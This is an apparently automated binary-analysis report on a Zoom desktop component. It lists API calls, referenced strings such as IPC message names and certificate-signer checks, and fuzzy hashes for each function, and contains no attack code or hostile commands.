                • Opcode Fuzzy Hash: bff3e51f7da313bec1b3f2aacebe36d4d97f5260106b97d4c3cfc22cc4c24d3f
                • Instruction Fuzzy Hash: 6E51AF70A043199FCF18EFB48991AEEB7B5AF44304F544069E805A7282DF749A48EF65
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CB698B
                • ??0?$CStringT@D@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(00D2E78F,000000EC,00CB6E5E,00D334D8,0000006C,?,00000000,00000008), ref: 00CB69C1
                • ?UInt64ToString@Cmm@@YAX_KAAV?$CStringT@D@1@@Z.RWSNDPQSKZ(?,?,?,000000EC,00CB6E5E,00D334D8,0000006C,?,00000000,00000008), ref: 00CB69D4
                • ??H?$CStringT@D@Cmm@@QBE?AV01@PBD@Z.RWSNDPQSKZ(00000000,{"m":",00CB6E5E,00D334D8,0000006C,?,00000000,00000008), ref: 00CB69E7
                • ??H?$CStringT@D@Cmm@@QBE?AV01@ABV01@@Z.RWSNDPQSKZ(?,00000028,00CB6E5E,00D334D8,0000006C,?,00000000,00000008), ref: 00CB69FA
                • ??H?$CStringT@D@Cmm@@QBE?AV01@PBD@Z.RWSNDPQSKZ(00CB6E5E,","f":",00CB6E5E,00D334D8,0000006C,?,00000000,00000008), ref: 00CB6A11
                • ??H?$CStringT@D@Cmm@@QBE?AV01@ABV01@@Z.RWSNDPQSKZ(?,00000044,00CB6E5E,00D334D8,0000006C,?,00000000,00000008), ref: 00CB6A27
                • ??H?$CStringT@D@Cmm@@QBE?AV01@PBD@Z.RWSNDPQSKZ(?,","t":",00CB6E5E,00D334D8,0000006C,?,00000000,00000008), ref: 00CB6A3E
                • ??H?$CStringT@D@Cmm@@QBE?AV01@ABV01@@Z.RWSNDPQSKZ(?,?,00CB6E5E,00D334D8,0000006C,?,00000000,00000008), ref: 00CB6A54
                • ??H?$CStringT@D@Cmm@@QBE?AV01@PBD@Z.RWSNDPQSKZ(?,00D333D8,00CB6E5E,00D334D8,0000006C,?,00000000,00000008), ref: 00CB6A68
                • ??0?$CStringT@D@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(00D2E78F,-00000004), ref: 00CB6B10
                • ?UInt64ToString@Cmm@@YAX_KAAV?$CStringT@D@1@@Z.RWSNDPQSKZ(?,00000000,00D334D8,-00000004), ref: 00CB6B22
                Strings
                Similarity
                • API ID: Cmm@@String$V01@$V01@@$??0?$D@1@@Int64String@$H_prolog3_
                • String ID: ","f":"$","t":"$,"c":${"m":"
                • API String ID: 2159182875-629339289
                • Opcode ID: acef86458e48934fcfaae5340f26cca6eec15031b8c20f2bdaf0cec79273be5f
                • Instruction ID: f143a59e9edc4bff72c325d11e3ad23bb675fc856b4ef741961df4541955847a
                • Opcode Fuzzy Hash: acef86458e48934fcfaae5340f26cca6eec15031b8c20f2bdaf0cec79273be5f
                • Instruction Fuzzy Hash: 94916CB8900308AFDF14EBA4D955AEDF7B4AF14305F404158E856B7292EB34AA8CDF64
                APIs
                • __EH_prolog3.LIBCMT ref: 00C5A0D3
                • std::_Lockit::_Lockit.LIBCPMT ref: 00C5A0DD
                • int.LIBCPMT ref: 00C5A0F4
                  • Part of subcall function 00C51CF1: std::_Lockit::_Lockit.LIBCPMT ref: 00C51D02
                  • Part of subcall function 00C51CF1: std::_Lockit::~_Lockit.LIBCPMT ref: 00C51D1C
                • std::_Facet_Register.LIBCPMT ref: 00C5A12E
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00000000,00000008,00C53009,?,?,?,00000028,00C64738), ref: 00C5A13B
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00C5A14E
                • Concurrency::cancel_current_task.LIBCPMT ref: 00C5A15B
                • __EH_prolog3_GS.LIBCMT ref: 00C5A168
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(&#x2329;,00000001,00002329,?,?,0000003C,00D33414,&apos;,00D333F4,&quot;,00D333D4,&gt;,00D333B8,&lt;,00D3339C), ref: 00C5A1A6
                • ?Replace@?$CStringT@_W@Cmm@@QAEXABV12@0@Z.RWSNDPQSKZ(?,?,&#x2329;,00000001,00002329,?,?,0000003C,00D33414,&apos;,00D333F4,&quot;,00D333D4,&gt;,00D333B8,&lt;), ref: 00C5A1B9
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(&#x232a;,00000001,0000232A,?,?,&#x2329;,00000001,00002329,?,?,0000003C,00D33414,&apos;,00D333F4,&quot;,00D333D4), ref: 00C5A1E4
                • ?Replace@?$CStringT@_W@Cmm@@QAEXABV12@0@Z.RWSNDPQSKZ(?,?,&#x232a;,00000001,0000232A,?,?,&#x2329;,00000001,00002329,?,?,0000003C,00D33414,&apos;,00D333F4), ref: 00C5A1F7
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(&#x300a;,00000001,0000300A,?,?,&#x232a;,00000001,0000232A,?,?,&#x2329;,00000001,00002329,?,?,0000003C), ref: 00C5A222
                • ?Replace@?$CStringT@_W@Cmm@@QAEXABV12@0@Z.RWSNDPQSKZ(?,?,&#x300a;,00000001,0000300A,?,?,&#x232a;,00000001,0000232A,?,?,&#x2329;,00000001,00002329), ref: 00C5A235
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(&#x300b;,00000001,0000300B,?,?,&#x300a;,00000001,0000300A,?,?,&#x232a;,00000001,0000232A,?,?,&#x2329;), ref: 00C5A260
                • ?Replace@?$CStringT@_W@Cmm@@QAEXABV12@0@Z.RWSNDPQSKZ(?,?,&#x300b;,00000001,0000300B,?,?,&#x300a;,00000001,0000300A,?,?,&#x232a;,00000001,0000232A,?), ref: 00C5A273
                  • Part of subcall function 00C53750: ?Replace@?$CStringT@_W@Cmm@@QAEXPB_W0@Z.RWSNDPQSKZ(?,?,?,00C5A1BE,?,?,&#x2329;,00000001,00002329,?,?,0000003C,00D33414,&apos;,00D333F4,&quot;), ref: 00C53771
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                Strings
                Similarity
                • API ID: Cmm@@$String$Replace@?$std::_$??0?$LockitV12@0@$Lockit::_Lockit::~_$Concurrency::cancel_current_taskDeallocateFacet_H_prolog3H_prolog3_RegisterState@Unlock@
                • String ID: &#x2329;$&#x232a;$&#x300a;$&#x300b;
                • API String ID: 3868370899-2233866962
                • Opcode ID: 623f29c3cbe816f485f00e985e2b4cbfde135de66ef32b073bb6199dfea68c62
                • Instruction ID: 8f05af561159b37b65fd5e11f0fd39dba437e581413beeb28dccb835866d695b
                • Opcode Fuzzy Hash: 623f29c3cbe816f485f00e985e2b4cbfde135de66ef32b073bb6199dfea68c62
                • Instruction Fuzzy Hash: DD51AE79D002489BCB05EBA4D956BEDBBB8AF08311F148019E811B7381DF745B8DEB65
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CA6A18
                • ?QueryStringAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(name,00000000,00000108,00CA6E71,00000000,00DFF9D0,module,?,?,00000000), ref: 00CA6A85
                  • Part of subcall function 00CA4870: ?Attribute@XMLElement@tinyxml2@@QBEPBDPBD0@Z.RWSNDPQSKZ(?,00000000,?), ref: 00CA488A
                • ?QueryStringAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(type,?,name,00000000,00000108,00CA6E71,00000000,00DFF9D0,module,?,?,00000000), ref: 00CA6A95
                • ?QueryStringAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(caps,?,type,?,name,00000000,00000108,00CA6E71,00000000,00DFF9D0,module,?,?,00000000), ref: 00CA6AA5
                • ??0?$CStringT@D@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(LoadModule - ,caps,?,type,?,name,00000000,00000108,00CA6E71,00000000,00DFF9D0,module), ref: 00CA6ABF
                  • Part of subcall function 00C562D0: __EH_prolog3.LIBCMT ref: 00C562D7
                • ??0?$CStringT@D@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(CmmPTUtil,00000000,caps,?,type,?,name,00000000,00000108,00CA6E71,00000000,00DFF9D0,module), ref: 00CA6AE2
                • ??0CCmmPerfTelemetryStacks@@QAE@ABV?$CStringT@D@Cmm@@0H@Z.RWSNDPQSKZ(?,?,00000000,00000000,caps,?,type,?,name,00000000,00000108,00CA6E71,00000000,00DFF9D0,module), ref: 00CA6B01
                  • Part of subcall function 00CB4FE0: __EH_prolog3.LIBCMT ref: 00CB4FE7
                  • Part of subcall function 00CB4FE0: GetTickCount.KERNEL32 ref: 00CB5022
                  • Part of subcall function 00C58567: _Deallocate.LIBCONCRT ref: 00C58576
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,00000000,.dll), ref: 00CA6B82
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,?,?,00000000,.dll), ref: 00CA6BA2
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001), ref: 00CA6BB8
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?), ref: 00CA6C00
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000), ref: 00CA6C16
                • ??1CCmmPerfTelemetryStacks@@QAE@XZ.RWSNDPQSKZ(?,00000000,.dll), ref: 00CA6C40
                Strings
                Similarity
                • API ID: Cmm@@String$Attribute@Element@tinyxml2@@State@Unlock@$??0?$D@2@@std@@@D@std@@Error@2@QueryU?$char_traits@V?$allocator@V?$basic_string@$H_prolog3PerfStacks@@Telemetry$Cmm@@0CountDeallocateH_prolog3_TickV01@@
                • String ID: .dll$CmmPTUtil$LoadModule - $caps$name$type
                • API String ID: 3087048408-1071006847
                • Opcode ID: d17c0a7f6742acbe46e8cc3ce8cf7b93ad6707b6334a3a8a033006a8db95d725
                • Instruction ID: b89f2b80b512c64f3c4bc926e19dc7f18fda38f561600086e3306f61aab684b4
                • Opcode Fuzzy Hash: d17c0a7f6742acbe46e8cc3ce8cf7b93ad6707b6334a3a8a033006a8db95d725
                • Instruction Fuzzy Hash: 97717D74E003199FCB14EFA4C881AEDBBB5AF59314F544099E809B7342DB706E89DF61
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C94EEC
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C75A39), ref: 00C94F00
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.share.meeting.chat.req,00000044,00C75A39), ref: 00C94F32
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,com.Zoom.app.conf.share.meeting.chat.req,00000044,00C75A39), ref: 00C94F6F
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.share.meeting.chat.req,?,-00000004,com.Zoom.app.conf.share.meeting.chat.req,00000044,00C75A39), ref: 00C94FA1
                • EnterCriticalSection.KERNEL32(?,?), ref: 00C95097
                • LeaveCriticalSection.KERNEL32(?,?,?), ref: 00C950B4
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,com.Zoom.app.conf.share.meeting.chat.req,00000044,00C75A39), ref: 00C950C7
                Strings
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.Zoom.app.conf.share.meeting.chat.req$lastIsNewSession$lastOperatorAccId$lastOperatorJid$lastSessionId$lastSessionName$lastSessionOption$lastSessionType$meetingId$meetingTopic$myAccountId
                • API String ID: 1443623190-1345633161
                • Opcode ID: 6b634132eae2a06b2e29c7830a9d225af5c4a0ea06c795cffd5bac445e5ec132
                • Instruction ID: 133e11e3cce060a4ac0127394fba186a4d86da08af17ad455cd5f04c5bd2a52c
                • Opcode Fuzzy Hash: 6b634132eae2a06b2e29c7830a9d225af5c4a0ea06c795cffd5bac445e5ec132
                • Instruction Fuzzy Hash: 0351D674F01B059BCF29EBA0C84969D7675AF45301F144028EC12AB391DF70DE8ADBEA
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8A11A
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6AEDE), ref: 00C8A12E
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.startcallout,00000044,00C6AEDE), ref: 00C8A160
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00C6AEDE,-00000004,com.Zoom.app.conf.startcallout,00000044,00C6AEDE), ref: 00C8A19D
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.startcallout,00C6AEDE,-00000004,com.Zoom.app.conf.startcallout,00000044,00C6AEDE), ref: 00C8A1CF
                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00002737,Calloutnumber,Username,bUseDTMF,bNoDialTone), ref: 00C8A29D
                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00002737,Calloutnumber,Username,bUseDTMF), ref: 00C8A2BA
                Strings
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@Tree
                • String ID: Calloutnumber$Username$bEnhanceInviteCallOut$bGreeting$bNoDialTone$bPressOne$bUseDTMF$com.Zoom.app.conf.startcallout$strCallId
                • API String ID: 89596651-2029554168
                • Opcode ID: 81ea239e962a87959cf4fe38f83aa8c9fcb2de3a071c519a2634ced24a824939
                • Instruction ID: 6f0020628be016ef76d4dc23bc6b7a2e9929d80ecd9e26e3bdde675bb77cecbe
                • Opcode Fuzzy Hash: 81ea239e962a87959cf4fe38f83aa8c9fcb2de3a071c519a2634ced24a824939
                • Instruction Fuzzy Hash: FC41E130A00614ABDF24EFA4D9056ADB7B5AF44309F044029E816EB385DF34DF4ADB6E
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8C6F9
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6C6DE), ref: 00C8C70D
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.inter.process.audio.sharing.service.register.response,00000044,00C6C6DE), ref: 00C8C73F
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00C6C6DE,-00000004,com.Zoom.app.conf.inter.process.audio.sharing.service.register.response,00000044,00C6C6DE), ref: 00C8C77C
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.inter.process.audio.sharing.service.register.response,00C6C6DE,-00000004,com.Zoom.app.conf.inter.process.audio.sharing.service.register.response,00000044,00C6C6DE), ref: 00C8C7AE
                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000027D6,result,mixedFMName,userFMName,shareFMName), ref: 00C8C87C
                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,000027D6,result,mixedFMName,userFMName), ref: 00C8C899
                Strings
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@Tree
                • String ID: com.Zoom.app.conf.inter.process.audio.sharing.service.register.response$maxChannel$mixedFMName$result$sampleDepth$samplesPerFrame$shareFMName$smapleRate$userFMName
                • API String ID: 89596651-1114125151
                • Opcode ID: 1ce5b384a17d3557e05928879550dc247c9e2b4ebbd2906dbb360f4bc9df234a
                • Instruction ID: 9ef244f367722819f8b5f625657be96a72e06ea1c0ebaf86c7a7f49c11978810
                • Opcode Fuzzy Hash: 1ce5b384a17d3557e05928879550dc247c9e2b4ebbd2906dbb360f4bc9df234a
                • Instruction Fuzzy Hash: 7641A034E007049BCF15EBA4C99669D76A5AF94305F084128EC12AB3D1DF70DE8ADBB9
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8A9EE
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6B59F), ref: 00C8AA02
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.custom3DAvatar.uptoweb.update,00000044,00C6B59F), ref: 00C8AA34
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00C6B59F,-00000004,com.Zoom.app.conf.custom3DAvatar.uptoweb.update,00000044,00C6B59F), ref: 00C8AA71
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.custom3DAvatar.uptoweb.update,00C6B59F,-00000004,com.Zoom.app.conf.custom3DAvatar.uptoweb.update,00000044,00C6B59F), ref: 00C8AAA3
                • EnterCriticalSection.KERNEL32(?), ref: 00C8AB71
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C8AB8E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@Tree
                • String ID: auto_generated_additional_data$avatar_version$com.Zoom.app.conf.custom3DAvatar.uptoweb.update$component_data$index$is_auto_generated$old_file_id$thumbnail_path$type
                • API String ID: 89596651-3790094516
                APIs
                Strings
                • sync_comment_count_handler, xrefs: 00CB8534
                • undefined_fetch_handler, xrefs: 00CB8565
                • sync_single_thread_handler, xrefs: 00CB853B
                • xmpp_parse_data_handler, xrefs: 00CB855E
                • fetch_emoji_info_handler, xrefs: 00CB84FC
                • fetch_jump_thread_handler, xrefs: 00CB850A
                • http_switch_handler, xrefs: 00CB8557
                • sync_thread_comment_count_handler, xrefs: 00CB852D
                • sync_thread_comment_countex_handler, xrefs: 00CB8550
                • fetch_history_comment_handler, xrefs: 00CB8511
                • request_optionkeys_handler, xrefs: 00CB8542
                • emoji_action_result_handler, xrefs: 00CB8526
                • fetch_emoji_count_info_handler, xrefs: 00CB851F
                • sync_thread_handler, xrefs: 00CB8503
                • base_request_handler, xrefs: 00CB8549
                • fetch_history_thread_handler, xrefs: 00CB8518
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: H_prolog3
                • String ID: base_request_handler$emoji_action_result_handler$fetch_emoji_count_info_handler$fetch_emoji_info_handler$fetch_history_comment_handler$fetch_history_thread_handler$fetch_jump_thread_handler$http_switch_handler$request_optionkeys_handler$sync_comment_count_handler$sync_single_thread_handler$sync_thread_comment_count_handler$sync_thread_comment_countex_handler$sync_thread_handler$undefined_fetch_handler$xmpp_parse_data_handler
                • API String ID: 431132790-3961229391
                APIs
                • WTHelperProvDataFromStateData.WINTRUST(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00CDA66B), ref: 00CDA37A
                • WTHelperGetProvSignerFromChain.WINTRUST(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00CDA66B), ref: 00CDA3A7
                • WTHelperGetProvCertFromChain.WINTRUST(00000000,00000000,?,?,?,?,?,?,?,?,00CDA66B), ref: 00CDA3CA
                • CertGetNameStringW.CRYPT32(?,00000004,00000000,00000000,00000000,00000000), ref: 00CDA3EE
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CDA491
                • HeapFree.KERNEL32(00000000), ref: 00CDA498
                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00CDA66B), ref: 00CDA4DB
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00CDA66B), ref: 00CDA4E2
                Strings
                • Entrust Root Certification Authority, xrefs: 00CDA4B8
                • Zoom Video Communications, Inc., xrefs: 00CDA464
                • DigiCert, xrefs: 00CDA4C8
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Heap$FromHelperProv$CertChainDataFreeProcess$NameSignerStateString
                • String ID: DigiCert$Entrust Root Certification Authority$Zoom Video Communications, Inc.
                • API String ID: 1193424130-3496748739
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C524CB
                  • Part of subcall function 00CD4250: SetDllDirectoryW.KERNEL32(00D34CD0), ref: 00CD4271
                  • Part of subcall function 00CD4250: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 00CD42A7
                  • Part of subcall function 00CD4250: VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003), ref: 00CD42B3
                  • Part of subcall function 00CD4250: VerSetConditionMask.KERNEL32(00000000,?,00000020,00000003), ref: 00CD42BF
                  • Part of subcall function 00CD4250: VerSetConditionMask.KERNEL32(00000000,?,00000010,00000003), ref: 00CD42CB
                  • Part of subcall function 00CD4250: VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 00CD42DA
                  • Part of subcall function 00CD4250: GetLastError.KERNEL32(?,?,00000010,00000003,?,00000020,00000003,?,00000001,00000003), ref: 00CD42E4
                  • Part of subcall function 00CD4250: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000001), ref: 00CD4330
                  • Part of subcall function 00CD4250: VerSetConditionMask.KERNEL32(00000000,?,00000001,00000001), ref: 00CD433C
                  • Part of subcall function 00CD4250: VerifyVersionInfoW.KERNEL32(?,00000003,00000000), ref: 00CD434B
                • ?GetModuleFilePath@CFileName@Cmm@@QAEXPAUHINSTANCE__@@@Z.RWSNDPQSKZ(00000000,?,?,?,?,?,?,?,?,?,?,?,000000B0), ref: 00C524F9
                  • Part of subcall function 00C523E0: ?GetModuleFileNameW@CFileName@Cmm@@QAEXPAUHINSTANCE__@@@Z.RWSNDPQSKZ(?), ref: 00C523EB
                  • Part of subcall function 00C523E0: ?GetPath@CFileName@Cmm@@QBE?AV?$CFnRangeT@_W@2@H@Z.RWSNDPQSKZ(?,00000000), ref: 00C523F8
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,?,000000B0), ref: 00C5250D
                  • Part of subcall function 00C54490: __EH_prolog3.LIBCMT ref: 00C54497
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(\ZoomOutlookMAPI,?,?,?,?,?,?,?,?,?,?,?,?,000000B0), ref: 00C52520
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                • ??0?$CStringT@_W@Cmm@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.RWSNDPQSKZ(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,-00000004,00000000), ref: 00C5255C
                • SetErrorMode.KERNEL32(00000002,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,-00000004), ref: 00C52594
                  • Part of subcall function 00C5C27D: ??0CEvent@Cmm@@QAE@XZ.RWSNDPQSKZ ref: 00C5C29D
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,-00000004,00000000), ref: 00C525FA
                • GetCurrentThreadId.KERNEL32 ref: 00C52608
                • SetConsoleCtrlHandler.KERNEL32(Function_00002480,00000001,?,?,?,?,?,?,?,?,?,?,-00000004,00000000,\ZoomOutlookMAPI,?), ref: 00C5261A
                • SetTimer.USER32(00000000,00000001,00000032,00C524B0), ref: 00C52629
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C5263B
                • TranslateMessage.USER32(?), ref: 00C5264D
                • DispatchMessageW.USER32(?), ref: 00C5265A
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C5266A
                • SetConsoleCtrlHandler.KERNEL32(Function_00002480,00000000,?,?,?,?,?,?,?,?,?,?,-00000004,00000000,\ZoomOutlookMAPI,?), ref: 00C52676
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$ConditionMask$File$Message$??0?$Name@String$ConsoleCtrlE__@@@ErrorHandlerInfoModulePath@VerifyVersion$CurrentDeallocateDirectoryDispatchEvent@H_prolog3H_prolog3_LastModeNameRangeState@ThreadTimerTranslateU?$char_traits@_Unlock@V?$allocator@_V?$basic_string@_W@2@W@2@@std@@@W@std@@
                • String ID: \ZoomOutlookMAPI
                • API String ID: 3407468254-2543390975
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C94224
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C74E6A), ref: 00C94238
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.request.my.idp.token,00000044,00C74E6A), ref: 00C9426A
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00000044,-00000004,com.Zoom.app.conf.request.my.idp.token,00000044,00C74E6A), ref: 00C942A7
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.request.my.idp.token,00000044,-00000004,com.Zoom.app.conf.request.my.idp.token,00000044,00C74E6A), ref: 00C942D9
                • EnterCriticalSection.KERNEL32(?), ref: 00C94393
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C943B0
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,00000044,-00000004,com.Zoom.app.conf.request.my.idp.token,00000044,00C74E6A), ref: 00C943C3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: clientID$com.Zoom.app.conf.request.my.idp.token$idp_domain$refreshTokenUrl$reqID$url$userEmail$userID
                • API String ID: 1443623190-1785747134
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C926FA
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C71FDA), ref: 00C9270E
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.cci.ccivideo.joinmeeting.response,00000044,00C71FDA), ref: 00C92740
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00000044,-00000004,com.zoom.app.cci.ccivideo.joinmeeting.response,00000044,00C71FDA), ref: 00C9277D
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.cci.ccivideo.joinmeeting.response,00000044,-00000004,com.zoom.app.cci.ccivideo.joinmeeting.response,00000044,00C71FDA), ref: 00C927AF
                • EnterCriticalSection.KERNEL32(?), ref: 00C92869
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C92886
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,00000044,-00000004,com.zoom.app.cci.ccivideo.joinmeeting.response,00000044,00C71FDA), ref: 00C92899
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: ErrCode$ErrDetailCode$JsCallid$RecordScreen$SessionID$SessionName$Success$com.zoom.app.cci.ccivideo.joinmeeting.response
                • API String ID: 1443623190-3312910215
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8A834
